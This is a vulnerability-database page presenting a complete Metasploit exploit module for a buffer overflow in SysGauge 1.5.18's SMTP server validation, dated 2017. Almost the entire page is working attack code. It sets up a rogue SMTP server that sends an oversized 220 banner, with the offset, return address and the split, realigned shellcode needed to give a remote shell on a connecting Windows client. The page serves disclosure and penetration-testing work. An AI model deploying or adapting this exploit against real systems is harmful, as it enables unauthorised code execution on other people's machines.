SysGauge SMTP Validation Buffer Overflow

Published
Credit
Risk
2017.03.22
Chris Higgins, Peter Baris
High
CWE
CVE
Local
Remote
CWE-119
N/A
No
Yes

#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#

class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::TcpServer

Rank = NormalRanking

def initialize()
super(
'Name' => 'SysGauge SMTP Validation Buffer Overflow',
'Description' => %q{
This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client, resulting in an unprivileged shell.
},
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'Peter Baris' # Initial discovery and PoC
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '41479' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 306,
'BadChars' => "\x00\x0a\x0d\x20"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal',
{
'Offset' => 176,
'Ret' => 0x6527635E # call esp # QtGui4.dll
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Feb 28 2017',
'DefaultTarget' => 0
)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
])
end

def on_client_connect(c)
# Note here that the payload must be split into two parts.
# The payload gets jumbled in the stack so we need to split
# and align to get it to execute correctly.
sploit = "220 "
sploit << rand_text(target['Offset'])
# Can only use the last part starting from 232 bytes in
sploit << payload.encoded[232..-1]
sploit << rand_text(2)
sploit << [target.ret].pack('V')
sploit << rand_text(12)
sploit << make_nops(8)
# And the first part up to 232 bytes
sploit << payload.encoded[0..231]
sploit << "ESMTP Sendmail \r\n"

print_status("Client connected: " + c.peerhost)
print_status("Sending payload...")

c.put(sploit)
end

end


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com